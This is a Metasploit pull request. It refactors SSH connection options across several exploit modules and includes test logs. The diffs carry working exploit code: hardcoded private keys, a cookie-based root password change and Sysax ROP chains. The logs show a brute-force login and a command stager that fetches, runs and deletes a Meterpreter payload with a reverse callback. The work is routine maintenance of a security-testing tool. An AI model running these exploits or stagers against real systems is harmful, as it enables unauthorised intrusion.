+      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
+      -----END RSA PRIVATE KEY-----
+    EOF
+  end
 end
-
-

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -67,17 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login()
-    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
-    opt_hash = {
+    opt_hash = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :key_data        => [ key_data ],
-      :use_agent       => false,
-      :config          => false,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => [ key_data ]
+    })
     opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
     begin
       ssh_socket = nil

--- a/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
+++ b/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
@@ -55,7 +55,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Automatic', {}
           ]
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 

--- a/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
+++ b/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
@@ -78,17 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       auth_methods: ['password', 'keyboard-interactive'],
-      port: rport,
-      use_agent: false,
-      config: false,
       password: password,
-      proxy: factory,
-      non_interactive: true,
-      verify_host_key: :never
-    }
+      port: rport
+    })
 
     begin
       ssh = nil

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -184,17 +184,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(ip, user, pass, port)
-    factory = ssh_socket_factory
-    opt_hash = {
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => port,
-      :use_agent       => false,
-      :config          => false,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+
+    opt_hash = ssh_client_defaults.merge({
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: port,
+      password: pass
+    })
 
     opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -117,17 +117,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def do_login
     change_password
     print_status("#{rhost}:22 - Attempt to start a SSH connection...")
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['password', 'keyboard-interactive'],
       :port            => 22,
-      :use_agent       => false,
-      :config          => true,
-      :password        => new_password,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :password        => new_password
+    })
     opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
     begin
       ssh = nil

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -11,38 +11,39 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
-      'Description'    => %q(
-        This module exploits inadequate access controls within the webUI to enable
-        the SSH service and change the root password. This module has been tested successfully
-        on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Schneider Electric Pelco Endura NET55XX Encoder',
+        'Description' => %q{
+          This module exploits inadequate access controls within the webUI to enable
+          the SSH service and change the root password. This module has been tested successfully
+          on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Lucas Dinucci <idntk.lucdin@gmail.com>',
           'Vitor Esperança <vitor@machiaveliclabs.com>'
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2019-6814'],
           ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
         ],
-      'Payload'        =>
-        {
+        'Payload' => {
           'Compat' => {
-            'PayloadType'    => 'cmd_interact',
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find'
           }
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'     => [ [ "Universal", {} ] ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2019-01-25',
-      'DefaultTarget'  => 0))
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [ [ 'Universal', {} ] ],
+        'Privileged' => true,
+        'DisclosureDate' => '2019-01-25',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
@@ -82,34 +83,35 @@ class MetasploitModule < Msf::Exploit::Remote
                  '</Body>'\
                  '</Envelope><?xml version="1.0" encoding="UTF-8"?>'
 
-    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    connect_udp(true, { 'RPORT' => datastore['UDP_PORT'] })
     udp_sock.put(xmlPayload)
     resp = []
     resp << udp_sock.get(datastore['TIMEOUT'])
     xmlResponse = resp.join(',')
     disconnect_udp
-    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
+    if xmlResponse.include?('NET5501') || xmlResponse.include?('NET5501-I') || xmlResponse.include?('NET5501-XT') || xmlResponse.include?('NET5504') || xmlResponse.include?('NET5500') || xmlResponse.include?('NET5516') || xmlResponse.include?('NET5508')
       return Exploit::CheckCode::Appears
     end
-     CheckCode::Safe
+
+    CheckCode::Safe
   end
 
   def change_password
     print_status("#{peer} - Attempt to change the root password...")
-    post = {enable: true, passwd: new_password, userid: "root"}.to_json
+    post = { enable: true, passwd: new_password, userid: 'root' }.to_json
 
     login = send_request_cgi({
       'method' => 'POST',
-      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
       'data' => post,
       'headers' =>
       {
-        'Cookie'        => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
-        'Content-Type'  => 'application/json;charset=utf-8'
+        'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
+        'Content-Type' => 'application/json;charset=utf-8'
       }
-    }, timeout=datastore['TIMEOUT'])
+    }, timeout = datastore['TIMEOUT'])
 
-    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
+    fail_with(Failure::UnexpectedReply, 'Failed to change root password') unless login && login.code == 200
     print_good("#{rhost}:80 - Successfully changed the root password...")
     print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
   end
@@ -118,11 +120,11 @@ class MetasploitModule < Msf::Exploit::Remote
     change_password
     print_status("#{rhost}:22 - Attempt to start a SSH connection...")
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => 22,
-      :password        => new_password
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: 22,
+      password: new_password
     })
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
     begin
       ssh = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

--- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb
+++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb
@@ -63,17 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       auth_methods: ['password', 'keyboard-interactive'],
       port: rport,
-      use_agent: false,
-      config: false,
-      password: password,
-      proxy: factory,
-      non_interactive: true,
-      verify_host_key: :never
-    }
+      password: password
+    })
 
     begin
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

--- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb
+++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb
@@ -40,7 +40,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'linux',
         'PayloadType' => 'cmd_interact',
         'Privileged' => true,
-        'Targets' => [ [ 'Universal', {} ] ]
+        'Targets' => [ [ 'Universal', {} ] ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
       )
     )
 

--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -12,50 +12,49 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::SSH
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution",
-      'Description'    => %q{
-        This module exploits a default hardcoded private SSH key or default hardcoded
-        login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made
-        by Array Networks. After logged in as the unprivileged user, it's possible to modify
-        the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.
-        Execution is possible by using the backend tool, running setuid, to turn the debug
-        monitoring on. This makes it possible to trigger a payload with root privileges.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'xistence <xistence[at]0x90.nl>',  # Original discovery and Metasploit module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution',
+        'Description' => %q{
+          This module exploits a default hardcoded private SSH key or default hardcoded
+          login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made
+          by Array Networks. After logged in as the unprivileged user, it's possible to modify
+          the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.
+          Execution is possible by using the backend tool, running setuid, to turn the debug
+          monitoring on. This makes it possible to trigger a payload with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xistence <xistence[at]0x90.nl>', # Original discovery and Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           ['OSVDB', '104652'],
           ['OSVDB', '104653'],
           ['OSVDB', '104654'],
           ['PACKETSTORM', '125761']
         ],
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Payload' => {
           'Compat' =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic telnet',
-            }
+                  {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'generic telnet'
+                  }
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           ['vAPV 8.3.2.17 / vxAG 9.2.0.34', {}],
         ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2014-02-03',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        'DisclosureDate' => '2014-02-03',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
@@ -100,9 +99,9 @@ class MetasploitModule < Msf::Exploit::Remote
     key_data += "-----END DSA PRIVATE KEY-----\n"
 
     opts = ssh_client_defaults.merge({
-      :auth_methods    => ['publickey'],
-      :port            => rport,
-      :key_data        => key_data
+      auth_methods: ['publickey'],
+      port: rport,
+      key_data: key_data
     })
 
     opts
@@ -112,14 +111,14 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{rhost}:#{rport} - Attempting to login with '#{user}:#{pass}'")
     factory = ssh_socket_factory
     opts = {
-      :auth_methods    => ['password', 'keyboard-interactive'],
-      :port            => rport,
-      :use_agent       => false,
-      :config          => true,
-      :password        => pass,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      use_agent: false,
+      config: true,
+      password: pass,
+      proxy: factory,
+      non_interactive: true,
+      verify_host_key: :never
     }
 
     opts
@@ -127,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def build_command
     mon_temp = rand_text_alphanumeric(10)
-    cmd = Rex::Text.encode_base64("nohup " + payload.encoded)
+    cmd = Rex::Text.encode_base64('nohup ' + payload.encoded)
     # Turn debug monitoring off, just in case it's turned on
     command = '/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`;'
     # Copy the data from monitor.sh to a random tmp file
@@ -142,8 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     command
   end
 
-
-  #def execute_command(cmd, opts)
+  # def execute_command(cmd, opts)
   def exploit
     user = datastore['USER']
     pass = datastore['PASS']
@@ -154,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
       opts = login_user_pass(user, pass)
     end
 
-    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
     begin
       ssh = nil

--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -99,17 +99,11 @@ class MetasploitModule < Msf::Exploit::Remote
     key_data += "+sqSEhA35Le2kC4Y1/A=\n"
     key_data += "-----END DSA PRIVATE KEY-----\n"
 
-    factory = ssh_socket_factory
-    opts = {
+    opts = ssh_client_defaults.merge({
       :auth_methods    => ['publickey'],
       :port            => rport,
-      :use_agent       => false,
-      :config          => true,
-      :key_data        => key_data,
-      :proxy           => factory,
-      :non_interactive => true,
-      :verify_host_key => :never
-    }
+      :key_data        => key_data
+    })
 
     opts
   end

--- a/modules/exploits/windows/ssh/sysax_ssh_username.rb
+++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb
@@ -13,57 +13,52 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => "Sysax 5.53 SSH Username Buffer Overflow",
-        'Description'    => %q{
-            This module exploits a vulnerability found in Sysax's SSH service.  By
+        'Name' => 'Sysax 5.53 SSH Username Buffer Overflow',
+        'Description' => %q{
+          This module exploits a vulnerability found in Sysax's SSH service.  By
           supplying a long username, the SSH server will copy that data on the stack
           without proper bounds checking, therefore allowing remote code execution
           under the context of the user.  Please note that previous versions
           (before 5.53) are also affected by this bug.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Craig Freyman', # Initial discovery, PoC
+          'sinn3r' # Metasploit
+        ],
+        'References' => [
+          ['OSVDB', '79689'],
+          ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'],
+          ['EDB', '18535']
+        ],
+        'Payload' => {
+          'Space' => 1024,
+          'BadChars' => "\x00\x3a",
+          'StackAdjustment' => -3500
+        },
+        'DefaultOptions' => {
+          'EXITFUNC' => 'seh'
+        },
+        'Platform' => 'win',
+        'Targets' => [
           [
-            'Craig Freyman',  # Initial discovery, PoC
-            'sinn3r'          # Metasploit
+            'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
+            {
+              'Rop' => false,
+              'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe
+            }
           ],
-        'References'     =>
           [
-            ['OSVDB', '79689'],
-            ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'],
-            ['EDB', '18535']
-          ],
-        'Payload'        =>
-          {
-            'Space'           => 1024,
-            'BadChars'        => "\x00\x3a",
-            'StackAdjustment' => -3500
-          },
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => "seh"
-          },
-        'Platform'       => 'win',
-        'Targets'        =>
-          [
-            [
-              'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
-              {
-                'Rop' => false,
-                'Ret' => 0x00402669  # POP/POP/RET - sysaxservd.exe
-              }
-            ],
-            [
-              'Sysax 5.53 on Win2K3 SP1/SP2',
-              {
-                'Rop' => true,
-                'Ret' => 0x0046d23c  # ADD ESP, 0F8C # RETN
-              }
-            ]
-          ],
-        'Privileged'     => false,
+            'Sysax 5.53 on Win2K3 SP1/SP2',
+            {
+              'Rop' => true,
+              'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN
+            }
+          ]
+        ],
+        'Privileged' => false,
         'DisclosureDate' => '2012-02-27',
-        'DefaultTarget'  => 0
+        'DefaultTarget' => 0
       )
     )
 
@@ -78,11 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
       banner = sock.get_once(-1, 5) || ''
       disconnect
       vprint_status("Banner: #{banner}")
-      if banner.match?(/SSH\-2\.0\-SysaxSSH_1\.0/)
+      if banner.match?(/SSH-2\.0-SysaxSSH_1\.0/)
         return Exploit::CheckCode::Appears
       end
-    rescue
-      vprint_error("An error has occurred while trying to read a response from target")
+    rescue StandardError
+      vprint_error('An error has occurred while trying to read a response from target')
       return Exploit::CheckCode::Unknown
     end
 
@@ -93,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # Align the stack to the beginning of the fixed size payload
     #
-    align =  "\x54"              # PUSH ESP
+    align = "\x54" # PUSH ESP
     align << "\x58"              # POP EAX
     align << "\x04\x08"          # ADD AL,0x08
     align << "\x8b\x18"          # MOV EBX, [EAX]
@@ -128,8 +123,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_rop_exploit
-    junk = rand_text(4).unpack("L")[0].to_i
-    nop  = make_nops(4).unpack("L")[0].to_i
+    junk = rand_text(4).unpack('L')[0].to_i
+    nop = make_nops(4).unpack('L')[0].to_i
 
     # !mona rop -m msvcrt
     p =
@@ -158,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
         0x77bb2563, # POP EAX # RETN
         nop,
         0x77be6591, # PUSHAD # ADD AL,0EF # RETN
-      ].pack("V*")
+      ].pack('V*')
 
     p << payload.encoded
 
@@ -211,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("Cannot establish a connection on #{rhost}:#{rport}")
       return
     rescue StandardError => e
-      if e.message.match?(/fingerprint [0-9a-z\:]+ does not match/)
+      if e.message.match?(/fingerprint [0-9a-z:]+ does not match/)
         print_error("Please remove #{rhost}:#{rport} from your known_hosts list")
         return
       end

--- a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
@@ -143,6 +143,7 @@ RSpec.describe Metasploit::Framework::LoginScanner::SSH do
             :config          => false,
             :verbose         => ssh_scanner.verbosity,
             :proxy           => factory,
+            :append_all_supported_algorithms => true,
             :auth_methods    => ['password','keyboard-interactive'],
             :password        => private,
             :non_interactive => true,


### PR DESCRIPTION
This PR fix #16328 and depends on  #16318 to add `append_all_supported_algorithms` to `true` the `lib/msf/core/exploit/remote/ssh.rb` be landed.

## Enviorement
```dockerfile
FROM alpine:latest

RUN apk add --update
RUN apk --no-cache add openssh
RUN ssh-keygen -A
RUN echo 'root:toor' | chpasswd

RUN echo $' AuthorizedKeysFile .ssh/authorized_keys\n\
GatewayPorts no \n\
X11Forwarding no \n\
Subsystem       sftp    /usr/lib/ssh/sftp-server \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes' > /etc/ssh/sshd_config

RUN echo "KexAlgorithms diffie-hellman-group1-sha1"  >> /etc/ssh/sshd_config

RUN addgroup -g 700 bob \
    && adduser -G bob -D -u 700 -S -h /home/bob -s /bin/sh bob
RUN echo -n 'bob:Password1' | chpasswd

EXPOSE 22

CMD ["/usr/sbin/sshd","-D"]

```
## Tests

<details>
<summary>before</summary>

<p>

```

msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG true
SSH_DEBUG => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T15:33:25.204312 #1997] DEBUG -- net.ssh.transport.session[4114]: establishing connection to 127.0.0.1:2222
D, [2022-03-19T15:33:25.209648 #1997] DEBUG -- net.ssh.transport.session[4114]: connection established
I, [2022-03-19T15:33:25.210322 #1997]  INFO -- net.ssh.transport.server_version[4128]: negotiating protocol version
D, [2022-03-19T15:33:25.210545 #1997] DEBUG -- net.ssh.transport.server_version[4128]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T15:33:25.219134 #1997] DEBUG -- net.ssh.transport.server_version[4128]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T15:33:25.222597 #1997]  INFO -- net.ssh.transport.algorithms[413c]: sending KEXINIT
D, [2022-03-19T15:33:25.224080 #1997] DEBUG -- socket[4150]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T15:33:25.224770 #1997] DEBUG -- socket[4150]: sent 800 bytes
D, [2022-03-19T15:33:25.225522 #1997] DEBUG -- socket[4150]: read 840 bytes
D, [2022-03-19T15:33:25.225826 #1997] DEBUG -- socket[4150]: received packet nr 0 type 20 len 836
I, [2022-03-19T15:33:25.226130 #1997]  INFO -- net.ssh.transport.algorithms[413c]: got KEXINIT from server
I, [2022-03-19T15:33:25.226356 #1997]  INFO -- net.ssh.transport.algorithms[413c]: negotiating algorithms
[-] 127.0.0.1:2222 - Failed: 'bob:Password1'
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

</p>
</details>



<details>
<summary>after proper exception handling</summary>
<p>
The previous implementation was misleading the user saying the authentication failed when it indeed didn't manage to settle the key exchange algorithm. 
</p>
<p>

```

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T16:08:57.756054 #4749] DEBUG -- net.ssh.transport.session[3d68]: establishing connection to 127.0.0.1:2222 through proxy
D, [2022-03-19T16:08:57.758002 #4749] DEBUG -- net.ssh.transport.session[3d68]: connection established
I, [2022-03-19T16:08:57.758427 #4749]  INFO -- net.ssh.transport.server_version[3d7c]: negotiating protocol version
D, [2022-03-19T16:08:57.758713 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T16:08:57.788388 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T16:08:57.792768 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: sending KEXINIT
D, [2022-03-19T16:08:57.793691 #4749] DEBUG -- socket[3da4]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T16:08:57.794045 #4749] DEBUG -- socket[3da4]: sent 800 bytes
D, [2022-03-19T16:08:57.794369 #4749] DEBUG -- socket[3da4]: read 840 bytes
D, [2022-03-19T16:08:57.794814 #4749] DEBUG -- socket[3da4]: received packet nr 0 type 20 len 836
I, [2022-03-19T16:08:57.795104 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: got KEXINIT from server
I, [2022-03-19T16:08:57.795577 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: negotiating algorithms
[-] 127.0.0.1:2222 - Could not connect: could not settle on kex algorithm
Server kex preferences: diffie-hellman-group1-sha1
Client kex preferences: ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

```
</p>
</details>

:exclamation: All tests from here were performed using the same changes done by #16318 (defining the `append_all_supported_algorithms` to `true`)

I didn't commit it again here to avoid conflicts during the merge.

<details>
<summary>after ssh defaults merge </summary>

<p>

```

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux 7ccf5b4903f9 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (127.0.0.1:53511 -> 127.0.0.1:2222 ) at 2022-03-19 20:38:29 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

```

<details>
<summary>test pivot</summary>
<p>

```

msf6 auxiliary(scanner/http/http_version) > route add 10.0.5.3 2
[*] Route added
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 10.0.5.3
RHOSTS => 10.0.5.3
msf6 auxiliary(scanner/http/http_version) > run
D, [2022-03-20T19:35:30.594267 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:30.595014 #7475] DEBUG -- socket[3da4]: queueing packet nr 25 type 90 len 80
D, [2022-03-20T19:35:31.093781 #7475] DEBUG -- socket[3da4]: sent 148 bytes
D, [2022-03-20T19:35:31.099156 #7475] DEBUG -- socket[3da4]: read 100 bytes
D, [2022-03-20T19:35:31.099588 #7475] DEBUG -- socket[3da4]: received packet nr 57 type 91 len 32
I, [2022-03-20T19:35:31.099940 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_open_confirmation: 7 1 2097152 32768
D, [2022-03-20T19:35:31.602128 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:31.604293 #7475] DEBUG -- socket[3da4]: queueing packet nr 26 type 94 len 144
D, [2022-03-20T19:35:31.605715 #7475] DEBUG -- socket[3da4]: sent 212 bytes
D, [2022-03-20T19:35:31.614001 #7475] DEBUG -- socket[3da4]: read 324 bytes
D, [2022-03-20T19:35:31.615644 #7475] DEBUG -- socket[3da4]: received packet nr 58 type 94 len 256
I, [2022-03-20T19:35:31.618024 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_data: 7 237b

[+] 10.0.5.3:80 lighttpd/1.4.64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```
</p>
</details>

</p>
</details>


<details>
<summary>
both modules after all changes
</summary>

<p>

```

msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.137.1:4444
[*] 127.0.0.1:2222 - Sending stager...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'", "((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'"]
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Executing ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.137.1
[*] Meterpreter session 1 opened (192.168.137.1:4444 -> 192.168.137.1:51037 ) at 2022-03-24 22:48:48 +0100
[!] Timed out while waiting for command to return
